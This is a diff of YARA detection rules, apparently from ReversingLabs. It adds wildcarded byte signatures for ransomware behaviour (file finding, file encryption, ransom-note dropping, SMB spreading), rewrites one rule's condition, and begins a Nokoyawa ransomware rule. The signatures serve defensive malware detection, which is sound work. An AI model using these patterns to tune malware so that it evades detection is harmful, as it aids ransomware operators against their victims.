+            68 ?? ?? ?? ?? 50 FF D6 83 C4 ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 68
+        }
+		$find_files_v2 = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 8B 45
+            ?? 53 8B 5D ?? 56 57 53 89 44 24 ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 89 4C 24
+            ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
+            8B F0 89 74 24 ?? 83 FE ?? 75 ?? FF 15 ?? ?? ?? ?? 50 53 68 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 C4 ?? 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C2 ?? ?? 8B
+            3D ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D7 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 44
+            24 ?? 50 FF D7 85 C0 74 ?? F7 44 24 ?? ?? ?? ?? ?? 75 ?? 8D 44 24 ?? 50 53 8D 84 24
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? F6 44 24 ?? ?? 74 ?? BE ?? ??
+            ?? ?? 8D 44 24 ?? 50 FF 36 FF D7 85 C0 74 ?? 83 C6 ?? 81 FE ?? ?? ?? ?? 7C ?? FF 74
+            24 ?? 8B 4C 24 ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 74 24 ?? 8D 44 24 ?? 50
+            56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ??
+            ?? 5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5 5D C2 ?? ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0
+            74 ?? 8D 4C 24 ?? 3B C1 74 ?? 68 ?? ?? ?? ?? 83 C0 ?? 50 8D 84 24 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BE ?? ?? ?? ?? 33 C0 66 89 84 24 ?? ?? ?? ?? 8D
+            84 24 ?? ?? ?? ?? 50 FF 36 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 83 C6 ??
+            81 FE ?? ?? ?? ?? 7C ?? 8B 74 24 ?? 8B CB E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 68
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? FF 74 24 ?? 50 E8 ?? ?? ??
+            ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 83 3D ?? ?? ?? ?? ?? 0F 85
+        }
+		$encrypt_files_v2_p1 = {
+            53 8B DC 83 EC ?? 83 E4 ?? 83 C4 ?? 55 8B 6B ?? 89 6C 24 ?? 8B EC 6A ?? 68 ?? ?? ??
+            ?? 64 A1 ?? ?? ?? ?? 50 53 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 57 50
+            8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 43 ?? 8B 73 ?? 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 6A ?? 50 89 B5 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ??
+            0F 57 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 0F 13 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ??
+            6A ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 6A ?? 56 8D
+            8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? 6A ?? 8B 40 ?? 03 C8 33 C0 39 41 ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50
+            E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? F6 84 05 ?? ?? ?? ??
+            ?? 74 ?? FF 15 ?? ?? ?? ?? 50 56 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50
+            E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
+            33 F6 E9 ?? ?? ?? ?? 6A ?? 83 EC ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? 8B 8C 05 ?? ?? ?? ?? 85 C9 74 ?? 8B
+            01 FF 50 ?? 51 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? C6 45
+            ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? F6 84 0D ?? ?? ?? ?? ?? 75 ?? 8B 8C 0D
+        }
+		$encrypt_files_v2_p2 = {
+            8D 95 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 01 6A ?? 52 FF 50 ?? C6 45 ?? ?? 8B 85 ?? ??
+            ?? ?? EB ?? 0F 57 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F
+            11 85 ?? ?? ?? ?? C6 45 ?? ?? 8B 40 ?? 8B 8C 05 ?? ?? ?? ?? 85 C9 74 ?? 8B 01 FF 50
+            ?? 6A ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 83 EC ?? 03 B5 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 75 ?? 68 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 83 C4 ?? 33 F6 E9 ?? ?? ?? ?? 6A ?? 56 57 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ??
+            8B 40 ?? 03 C8 33 C0 39 41 ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8 ?? ?? ??
+            ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 33 C9 83 C4 ?? 8B C6 83 C0 ?? 0F 92 C1 F7 D9 0B C8 51 E8 ?? ?? ??
+            ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 57
+            E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
+            81 FE ?? ?? ?? ?? 73 ?? 8D 45 ?? 50 8D 45 ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 EB
+            ?? 8D 0C B6 B8 ?? ?? ?? ?? C1 E1 ?? F7 E1 8D 45 ?? 50 8D 45 ?? C1 EA ?? 50 6A ?? 6A
+            ?? 6A ?? 6A ?? 8B C6 2B C2 6A ?? 50 57 6A ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 8D 45
+            ?? 83 C4 ?? 57 6A ?? 6A ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45
+        }
+		$encrypt_files_v2_p3 = {
+            57 6A ?? 6A ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 8D
+            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ??
+            6A ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 8D 8D ??
+            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84
+            05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ??
+            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 51 C6 45 ?? ?? 6A ?? 8B BD ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 57
+            E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B 40 ?? 03 C8
+            33 C0 39 41 ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8 ?? ?? ?? ?? 6A ?? 6A ??
+            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 51
+            ?? 8A 01 41 84 C0 75 ?? 2B CA 8D 85 ?? ?? ?? ?? 6A ?? 51 50 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 68
+            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 8A 01 41 84
+            C0 75 ?? 2B CA 8D 85 ?? ?? ?? ?? 6A ?? 51 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A
+        }
+		$encrypt_files_v2_p4 = {
+            6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 46 ?? 8B B5 ?? ?? ?? ?? 6A
+            ?? 50 56 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75
+            ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B 40 ?? 03 C8 33 C0 39 41 ?? 0F 94 C0
+            8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ??
+            ?? ?? ?? 57 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 57 FF
+            15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B
+            40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D
+            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ??
+            ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 50 ?? 8D 4A ?? 89 8C 15 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
+            C4 ?? 8B C6 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B
+            E5 5D 8B E3 5B C2
+        }
+		$drop_ransom_note_v2_p1 = {
+            53 8B DC 83 EC ?? 83 E4 ?? 83 C4 ?? 55 8B 6B ?? 89 6C 24 ?? 8B EC 6A ?? 68 ?? ?? ??
+            ?? 64 A1 ?? ?? ?? ?? 50 53 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 50 8D
+            45 ?? 64 A3 ?? ?? ?? ?? 8B F1 6A ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? 8B C6 66 83 3E ?? 74 ?? 0F 1F 80 ?? ?? ?? ?? 83 C0 ?? 66 83 38 ?? 75 ?? 50 56 8D
+            85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 83
+            BD ?? ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ??
+            ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ??
+            ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45
+            ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ??
+            ?? 6A ?? 68 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 85 ?? ?? ??
+            ?? 50 8D 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 8D 85 ?? ??
+            ?? ?? 3B C6 74 ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA
+            ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51
+            E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            C6 85 ?? ?? ?? ?? ?? 0F 10 06 0F 11 85 ?? ?? ?? ?? F3 0F 7E 46 ?? 66 0F D6 85 ?? ??
+            ?? ?? C7 46 ?? ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? C6 06 ?? 8B 95 ?? ?? ?? ?? 83 FA
+        }
+		$drop_ransom_note_v2_p2 = {
+            72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83
+            C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8B 95 ??
+            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ??
+            ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83
+            C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C6 45
+            ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ??
+            72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ??
+            ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 8D 8D ?? ?? ?? ?? C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ??
+            ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8
+            ?? ?? ?? ?? C6 45 ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 6A ?? 8D 85 ?? ?? ?? ?? 6A ?? 50
+            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 6A ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45
+            ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 89 8D ?? ?? ?? ?? 8B 01 FF 50 ?? 8D 85 ?? ?? ?? ??
+            C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C6 45 ??
+            ?? 8B 8D ?? ?? ?? ?? 85 C9 74 ?? 8B 01 8B 40 ?? FF D0 85 C0 74 ?? 8B 10 8B C8 6A ??
+            FF 12 EB ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B 40 ?? 03 C8 33 C0 39 41
+        }
+		$drop_ransom_note_v2_p3 = {
+            0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 83 BD ?? ?? ??
+            ?? ?? 74 ?? 83 BD ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 0F 43 95 ?? ??
+            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B 40
+            ?? 03 C8 33 C0 39 41 ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8 ?? ?? ?? ?? EB
+            ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B 40 ?? 03 C8 33 C0
+            39 41 ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84
+            0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05
+            ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? C6 45 ?? ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ??
+            ?? ?? ?? 83 C4 ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ??
+            8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83
+            C4 ?? 8B 95 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            C6 85 ?? ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72
+            ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D
+            8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ??
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5E 8B 4D ?? 33 CD E8 ??
+            ?? ?? ?? 8B E5 5D 8B E3 5B C3
+        }
+		$smb_spreading_v2_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 6A ?? 6A ?? 6A ??
+            6A ?? 68 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 83 C4 ?? C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? 83 3A ?? 0F 8E ?? ?? ?? ?? 33 DB 89 9D ?? ?? ?? ?? 8D 42
+            ?? 03 C3 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B C3 BB ?? ?? ?? ?? 89
+            85 ?? ?? ?? ?? 83 C4 ?? 89 9D ?? ?? ?? ?? 66 90 8D 72 ?? 03 F0 8B CE 8D 79 ?? 66 0F
+            1F 44 00 ?? 8A 01 41 84 C0 75 ?? 2B CF 0F 84 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 83 C4 ?? 8D 45 ?? 6A ?? 50 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? FF 15 ??
+            ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15
+            ?? ?? ?? ?? 83 C4 ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 1F 84 00 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ??
+            ?? 50 6A ?? 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 8B D8 85 DB 74 ?? 81 FB ?? ?? ?? ?? 0F 85
+            ?? ?? ?? ?? 33 FF 39 BD ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 33 F6 0F 1F 40 ?? 8B 85 ?? ??
+            ?? ?? 83 7C 06 ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 34 06 E8 ?? ?? ?? ?? 83 C4
+            ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? FF 34 06 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 50 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF
+        }
+		$smb_spreading_v2_p2 = {
+            15 ?? ?? ?? ?? 83 C4 ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 47 83 C6 ?? 3B BD ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ??
+            ?? ?? ?? 81 FB ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 8B
+            85 ?? ?? ?? ?? 05 ?? ?? ?? ?? 83 EB ?? 89 85 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 0F 85 ??
+            ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 46 81 C3 ?? ?? ?? ?? 89 B5 ?? ?? ?? ??
+            89 9D ?? ?? ?? ?? 3B 32 0F 8C ?? ?? ?? ?? 68 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 33 CD 33 C0 5F 5E 5B E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "yinsheng xie" and pe.signatures [ i ] . serial == "42:11:d2:e4:f0:e8:71:27:31:93:02:c5:5b:85:bc:f2" and 1360713599 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( ( all of ( $find_files_v1_p* ) ) and ( all of ( $network_enumeration_v1_p* ) ) and ( all of ( $delete_shadow_copies_v1_p* ) ) and ( all of ( $encrypt_files_v1_p* ) ) ) or ( ( $find_files_v2 ) and ( all of ( $encrypt_files_v2_p* ) ) and ( all of ( $drop_ransom_note_v2_p* ) ) and ( all of ( $smb_spreading_v2_p* ) ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_07B44Cdbfffb78De05F4261672A67312 : INFO FILE
+rule REVERSINGLABS_Win64_Ransomware_Nokoyawa : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Nokoyawa ransomware."
 		author = "ReversingLabs"
-		id = "18787692-1233-5ea8-869c-feb530d06237"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "31470ce4-381f-50d2-bbca-03c592e62a7d"
+		date = "2022-06-06"
+		modified = "2022-06-06"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L603-L619"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win64.Ransomware.Nokoyawa.yara#L1-L104"
